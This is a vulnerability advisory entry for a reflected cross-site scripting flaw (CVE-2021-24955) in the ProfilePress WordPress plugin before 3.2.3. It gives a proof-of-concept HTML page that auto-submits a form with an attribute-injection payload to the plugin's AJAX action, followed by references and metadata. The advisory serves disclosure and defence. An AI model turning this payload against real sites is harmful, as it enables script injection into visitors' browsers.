WordPress Plugin Vulnerabilities

ProfilePress < 3.2.3 - Reflected Cross-Site Scripting

Description

The plugin does not escape the data parameter of the pp_get_forms_by_builder_type AJAX action before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
      <input type="hidden" name="action" value="pp_get_forms_by_builder_type" />
      <input type="hidden" name="data" value='" onmouseover=alert(/XSS/) style=display:block;height:1000px;width:1000px; t="' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

Plugin icon
wp-user-avatar
Fixed in 3.2.3

References

CVE
CVE-2021-24955
URL
https://plugins.trac.wordpress.org/changeset/2626573/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified
Yes
WPVDB ID
e8005d4d-41c3-451d-b85a-2626decaa080

Timeline

Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2024-03-15
Title
HT Easy GA4 ( Google Analytics 4 ) < 1.1.8 - Reflected Cross-Site Scripting
Published
2016-07-13
Title
Master Slider < 2.8.0 - Reflected Cross-Site Scripting (XSS)
Published
2022-08-23
Title
All-in-One WP Migration < 7.63 - Unauthenticated Reflected XSS
Published
2024-04-30
Title
Min and Max Purchase for WooCommerce <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2024-03-13
Title
APIExperts Square for WooCommerce < 4.3 - Reflected Cross-Site Scripting